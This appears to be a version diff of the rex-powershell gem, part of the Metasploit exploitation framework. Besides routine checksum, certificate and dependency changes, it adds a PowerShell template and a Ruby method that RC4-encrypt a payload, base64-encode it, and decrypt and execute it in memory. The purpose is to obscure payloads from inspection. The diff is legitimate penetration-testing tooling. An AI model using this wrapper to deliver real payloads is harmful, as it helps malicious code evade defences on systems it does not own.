rex-powershell 0.1.85 → 0.1.90

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 702fe7016f4c75a159cfc75cce5020cac043533459028ae595e642690f7dee3d
-  data.tar.gz: e8cc37a3f4d5b54e00d946cc46a7be97a36afd594b3f779e4f14ec8c7ae3fd0d
+  metadata.gz: 0a33516521ac7e860fca2bc66ae38f9859cac0588b657c8ffbe2e5ce8120adde
+  data.tar.gz: 222e5ad9199ac80d8c8ec1b88d9504550f89b8811bc36dfc5df9bd34f3c7f329
 SHA512:
-  metadata.gz: a6840dad82143d20e681be0dd85a308d5ff37ae10cbbd9753ea2c565b4e8279a96e70edfc35d93338284acb85db35325100853c3e965ebb276f73a78ab163316
-  data.tar.gz: bc1f89c37c3e025996c6aed2086ce79b2cdf314ba6fff2be16bb8777a31fb00fb1440d5ff33716b7e7a505745ac5e69e43952e0114868ea6bf090e864fc3924a
+  metadata.gz: 2d048a4d9875adff24b0a7168813918bfa36914130fb41df3666242f2553571b9afe0befac3daa3117f557f0881289e0ec21ceefe2b11922315747a73b6613ff
+  data.tar.gz: df1b2109a3ffb337e5691f1a517ee08a99cb335c7b916c820a62e8caef91437a4c6815ad02bb7910daebb05a010acd51c79cc7ce101c7ab617577b9d4d1165ac

data/.travis.yml

@@ -3,4 +3,4 @@ group: stable
 cache: bundler
 language: ruby
 rvm:
-  - 2.3.3
+  - 2.7.2

data/data/templates/to_mem_rc4.ps1.template

@@ -0,0 +1,40 @@
+function %{func_rc4_decrypt} {
+    param([Byte[]]$%{var_rc4buffer})
+
+	$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
+
+    $s = New-Object Byte[] 256;
+    $k = New-Object Byte[] 256;
+
+    for ($i = 0; $i -lt 256; $i++)
+    {
+        $s[$i] = [Byte]$i;
+        $k[$i] = $%{var_key}[$i %% $%{var_key}.Length];
+    }
+
+    $j = 0;
+    for ($i = 0; $i -lt 256; $i++)
+    {
+        $j = ($j + $s[$i] + $k[$i]) %% 256;
+        $temp = $s[$i];
+        $s[$i] = $s[$j];
+        $s[$j] = $temp;
+    }
+
+    $i = $j = 0;
+    for ($x = 0; $x -lt $%{var_rc4buffer}.Length; $x++)
+    {
+        $i = ($i + 1) %% 256;
+        $j = ($j + $s[$i]) %% 256;
+        $temp = $s[$i];
+        $s[$i] = $s[$j];
+        $s[$j] = $temp;
+        [int]$t = ($s[$i] + $s[$j]) %% 256;
+        $%{var_rc4buffer}[$x] = $%{var_rc4buffer}[$x] -bxor $s[$t];
+    }
+
+    $%{var_rc4buffer}
+}
+
+&([scriptblock]::create(([system.Text.Encoding]::UTF8).GetString((%{func_rc4_decrypt} ([System.Convert]::FromBase64String("%{b64payload}"))))))
+

data/lib/rex/powershell/command.rb

@@ -123,6 +123,8 @@ module Command
   #   powershell profile (-NoProfile)
   # @option opts [String] :windowstyle The window style to use
   #   (-WindowStyle)
+  # @option opts [String] :version The version of Powershell to run
+  #   (-version)
   #
   # @return [String] Powershell command arguments
   def self.generate_psh_args(opts)
@@ -157,6 +159,8 @@ module Command
           arg_string << '-NoProfile ' if value
         when :windowstyle
           arg_string << "-WindowStyle #{value} " if value
+        when :version
+          arg_string << "-Version #{value} " if value
       end
     end
 
@@ -188,6 +192,7 @@ module Command
       arg_string.gsub!('-OutputFormat ', '-o ')
       arg_string.gsub!('-Sta ', '-s ')
       arg_string.gsub!('-WindowStyle ', '-w ')
+      arg_string.gsub!('-Version ', '-v ')
     end
 
     # Strip off first space character
@@ -301,7 +306,9 @@ EOS
       else
         fail RuntimeError, 'No Powershell method specified'
     end
-
+    if opts[:exec_rc4]
+      psh_payload = Rex::Powershell::Payload.to_win32pe_psh_rc4(template_path, psh_payload)
+    end
     # Run our payload in a while loop
     if opts[:persist]
       fun_name = Rex::Text.rand_text_alpha(rand(2) + 2)

data/lib/rex/powershell/payload.rb

@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 require 'rex/random_identifier'
+require 'rc4'
 
 module Rex
 module Powershell
@@ -106,6 +107,27 @@ module Payload
     read_replace_script_template(template_path, "to_mem_msil.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
 
+  #
+  # PSH script that executes an RC4 encrypted payload with Invoke-Expression
+  # by Adrian Vollmer (SySS GmbH, https://www.syss.de)
+  #
+  def self.to_win32pe_psh_rc4(template_path = TEMPLATE_DIR, code)
+    rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
+    rig.init_var(:func_rc4_decrypt)
+    rig.init_var(:var_rc4buffer)
+    rig.init_var(:var_key)
+
+    key = Rex::Text.rand_text_alpha(rand(8)+8)
+    rc4 = RC4.new(key)
+    enc_code = rc4.encrypt(code)
+
+    hash_sub = rig.to_h
+    hash_sub[:random_key] = key
+    hash_sub[:b64payload] = Rex::Text.encode_base64(enc_code)
+
+    read_replace_script_template(template_path, "to_mem_rc4.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
+  end
+
 end
 end
 end

data/lib/rex/powershell/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Powershell
-    VERSION = "0.1.85"
+    VERSION = "0.1.90"
   end
 end

data/rex-powershell.gemspec

@@ -6,8 +6,8 @@ require 'rex/powershell/version'
 Gem::Specification.new do |spec|
   spec.name          = "rex-powershell"
   spec.version       = Rex::Powershell::VERSION
-  spec.authors       = ["David 'thelightcosine' Maloney"]
-  spec.email         = ["DMaloney@rapid7.com"]
+  spec.authors       = ['Metasploit Hackers']
+  spec.email         = ['msfdev@metasploit.com']
 
   spec.summary       = %q{Rex Powershell Utilities}
   spec.description   = %q{Ruby Exploitation(Rex) library for generating/manipulating Powershell scripts}
@@ -20,10 +20,10 @@ Gem::Specification.new do |spec|
 
   spec.required_ruby_version = '>= 2.2.0'
 
-  spec.add_development_dependency "bundler", "~> 1.12"
-  spec.add_development_dependency "rake", "~> 10.0"
-  spec.add_development_dependency "rspec", "~> 3.0"
+  spec.add_development_dependency "rake"
+  spec.add_development_dependency "rspec"
 
   spec.add_runtime_dependency 'rex-text'
   spec.add_runtime_dependency 'rex-random_identifier'
+  spec.add_runtime_dependency 'ruby-rc4'
 end

metadata

@@ -1,10 +1,10 @@
 --- !ruby/object:Gem::Specification
 name: rex-powershell
 version: !ruby/object:Gem::Version
-  version: 0.1.85
+  version: 0.1.90
 platform: ruby
 authors:
-- David 'thelightcosine' Maloney
+- Metasploit Hackers
 autorequire: 
 bindir: exe
 cert_chain:
@@ -64,20 +64,20 @@ cert_chain:
   -----END CERTIFICATE-----
 - |
   -----BEGIN CERTIFICATE-----
-  MIIFIzCCBAugAwIBAgIQDX9ZkVJ2eNVTlibR5ALyJTANBgkqhkiG9w0BAQsFADBy
+  MIIFIzCCBAugAwIBAgIQCMePMbkSxvnPeJhYXIfaxzANBgkqhkiG9w0BAQsFADBy
   MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
   d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
-  SUQgQ29kZSBTaWduaW5nIENBMB4XDTE5MTAxNjAwMDAwMFoXDTIwMTAxOTEyMDAw
+  SUQgQ29kZSBTaWduaW5nIENBMB4XDTIwMTAwNzAwMDAwMFoXDTIzMTEwNjEyMDAw
   MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
   BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
-  IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANHnKegPAghKuZk4
-  Gy1jKaZEXbWc4fxioTemv/F1yIYzAjCWP65qjKtyeeFDe4/kJzG9nseF9oa93YBf
-  1nyEqxNSZMw/sCAZ87lOl713dRi73uxOoszy2PT5xEB+Q5R6cbzExkWG2zrLdXDr
-  so0Bd6VHw+IsAoBBkAq5FrZOJQYGn5VY20xw/2DqtCeoW4QDWyqTnbJmwO9tZrfr
-  3Le2crfk2eOgafaPNhLon5uuIKCZsk2YkUSNURSS3M7gosMwU9Gg4JTBi7X5+oww
-  rY43dJT28YklxmNVu8o5kJxW4dqLKJLOIgSXZ63nceT/EaCSg7DcofHNcUzejFwb
-  M7Zbb2kCAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
-  dQ5YMB0GA1UdDgQWBBR18CAeMsIEU+0pXal/XXw9LCtMADAOBgNVHQ8BAf8EBAMC
+  IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALNTz4zvAy7h/vQp
+  4dr1txXHlABAagkwYYwTMCtHs5PXsJITx/5SAjx5swuaLfze5kPBNF2YImvFlOXY
+  WaB+0PsOnXnaARsDZU683xFlj8izU6IN6VrAHzDLKFBzruJENrOJD/ikbEtbjO/q
+  gFbmS9J9v5ohG/pcRSS0t4ZPAwymf8eCp6QsvOKK/Aymp1RhlRaP8N6N5CIpkhz1
+  9p968iCE+DjOXVYxcWE+jE/7uB1dbgrXykNBujMSS3GULOvVEY28n6NCmrPlo23g
+  yRjYVJ2Vy14nBqnxDZ/yRIfWRVjWoT9TsAEbe9gY29oDpSCSs4wSmLQd5zGCpZ9h
+  r0HDFB8CAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
+  dQ5YMB0GA1UdDgQWBBTLBL7DTwumVEKtdCdpHVYMXOFeDzAOBgNVHQ8BAf8EBAMC
   B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
   L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
   L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
@@ -86,59 +86,59 @@ cert_chain:
   JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
   AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
   ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
-  BQADggEBAFpzR9s7lcYKDzSJucOHztEPj+iSIeCzxEw34NTE9M2AfkYIu82c4r2a
-  bzIGmzZWiCGufjOp0gF5xW6sSSJ9n0TqH0nhHhvjtZQkmkGtOBbN1zeYDFS2ozAp
-  sljF/g68Y1eYs3NaFf7kQUa6vb6RdjW3J8M9AQ8gthBt7gr/guVxd/gJUYbdDdBX
-  cWfJJi/X7GVBOBmmvA43qoKideuhOBrVGBHvIF/yO9p23dIiUrGmW9kxXCSxgute
-  JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
-  DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
+  BQADggEBAN+GL5/myPWg7oH4mVrG7/OhXF1MoYQF0ddaNiqaweEHMuKJBQCVZRbL
+  37HojoKXXv2yyRJBCeTB+ojrxX+5PdLVZa0ss7toWzJ2A1poPXZ1eZvm5xeFD32z
+  YQaTmmNWNI3PCDTyJ2PXUc+bDiNNwcZ7yc5o78UNRvp9Jxghya17Q76c9Ov9wvnv
+  dxxQKWGOQy0m4fBrkyjAyH9Djjn81RbQrqYgPuhd5nD0HjN3VUQLhQbIJrk9TVs0
+  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
+  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2020-02-17 00:00:00.000000000 Z
+date: 2021-04-23 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
-  name: bundler
+  name: rake
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '1.12'
+        version: '0'
   type: :development
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '1.12'
+        version: '0'
 - !ruby/object:Gem::Dependency
-  name: rake
+  name: rspec
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '10.0'
+        version: '0'
   type: :development
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '10.0'
+        version: '0'
 - !ruby/object:Gem::Dependency
-  name: rspec
+  name: rex-text
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '3.0'
-  type: :development
+        version: '0'
+  type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '3.0'
+        version: '0'
 - !ruby/object:Gem::Dependency
-  name: rex-text
+  name: rex-random_identifier
   requirement: !ruby/object:Gem::Requirement
     requirements:
     - - ">="
@@ -152,7 +152,7 @@ dependencies:
       - !ruby/object:Gem::Version
         version: '0'
 - !ruby/object:Gem::Dependency
-  name: rex-random_identifier
+  name: ruby-rc4
   requirement: !ruby/object:Gem::Requirement
     requirements:
     - - ">="
@@ -168,7 +168,7 @@ dependencies:
 description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
   scripts
 email:
-- DMaloney@rapid7.com
+- msfdev@metasploit.com
 executables: []
 extensions: []
 extra_rdoc_files: []
@@ -185,6 +185,7 @@ files:
 - data/templates/to_mem_msil.ps1.template
 - data/templates/to_mem_old.ps1.template
 - data/templates/to_mem_pshreflection.ps1.template
+- data/templates/to_mem_rc4.ps1.template
 - lib/rex/powershell.rb
 - lib/rex/powershell/command.rb
 - lib/rex/powershell/function.rb